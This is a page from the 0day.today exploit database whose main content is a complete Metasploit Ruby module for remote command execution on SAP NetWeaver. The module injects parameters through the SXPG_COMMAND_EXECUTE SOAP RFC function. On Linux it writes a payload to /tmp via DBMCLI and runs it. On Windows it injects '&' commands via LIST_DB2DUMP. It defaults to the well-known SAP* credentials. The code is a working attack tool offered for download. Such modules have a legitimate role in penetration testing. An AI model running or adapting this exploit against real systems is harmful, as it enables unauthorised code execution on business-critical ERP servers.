0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # This module is based on, inspired by, or is a port of a plugin available in # the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. # Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and # experience - a very cool guy. # # The following guys from ERP-SCAN deserve credit for their contributions - # Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and # Dmitry Evdokimov. # # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis # who have Beta tested the modules and provided excellent feedback. Some people # just seem to enjoy hacking SAP :) ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::CmdStagerVBS include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution', 'Description' => %q{ This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64 bits and Linux 64 bits platforms. }, 'References' => [ [ 'URL', 'http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection' ], [ 'URL', 'https://service.sap.com/sap/support/notes/1764994' ], [ 'URL', 'https://service.sap.com/sap/support/notes/1341333' ] ], 'DisclosureDate' => 'May 8 2012', 'Platform' => ['win', 'unix'], 'Targets' => [ [ 'Linux', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' #'Payload' => #{ #'DisableNops' => true, #'Space' => 232, #'Compat' => #{ #'PayloadType' => 'cmd', #'RequiredCmd' => 'perl ruby', #} #} } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64, 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'Author' => [ 'nmonkee' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(8000), OptString.new('CLIENT', [true, 'SAP Client', '001']), OptString.new('USERNAME', [true, 'Username', 'SAP*']), OptString.new('PASSWORD', [true, 'Password', '06071992']) ], self.class) register_advanced_options( [ OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]), ], self.class) end def send_soap_request(data) res = send_request_cgi({ 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'ctype' => 'text/xml; charset=UTF-8', 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', }, 'vars_get' => { 'sap-client' => datastore['CLIENT'], 'sap-language' => 'EN' } }) return res end def build_soap_request(command, sap_command, sap_os) data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n" data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n" data << "<env:Body>\r\n" data << "<n1:SXPG_COMMAND_EXECUTE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n" data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\r\n" data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>\r\n" data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\r\n" data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>\r\n" data << "</n1:SXPG_COMMAND_EXECUTE>\r\n" data << "</env:Body>\r\n" data << "</env:Envelope>" return data end def check data = rand_text_alphanumeric(4 + rand(4)) res = send_soap_request(data) if res and res.code == 500 and res.body =~ /faultstring/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit if target.name =~ /Windows/ linemax = datastore['PAYLOAD_SPLIT'] vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250 print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request") execute_cmdstager({ :delay => 0.35, :linemax => linemax }) elsif target.name =~ /Linux/ file = rand_text_alphanumeric(5) stage_one = create_unix_payload(1,file) print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...") res = send_soap_request(stage_one) if res and res.code == 200 and res.body =~ /External program terminated/ print_good("#{rhost}:#{rport} - Payload dump was successful") else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed") end stage_two = create_unix_payload(2,file) print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...") send_soap_request(stage_two) end end def create_unix_payload(stage, file) command = "" if target.name =~ /Linux/ if stage == 1 my_payload = payload.encoded.gsub(" ","\t") my_payload.gsub!("&","&") my_payload.gsub!("<","<") command = "-o /tmp/" + file + " -n pwnie" + "\n!" command << my_payload command << "\n" elsif stage == 2 command = "-ic /tmp/" + file end end return build_soap_request(command.to_s, "DBMCLI", "ANYOS") end def execute_command(cmd, opts) command = cmd.gsub(/&/, "&") command.gsub!(/%TEMP%\\/, "") data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT") begin res = send_soap_request(data) if res and res.code == 200 return else if res and res.body =~ /faultstring/ error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}) 0.upto(error.length-1) do |i| vprint_error("#{rhost}:#{rport} - Error #{error[i]}") end end print_status("#{res.code}\n#{res.body}") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect") end end end # 0day.today [2024-11-15] #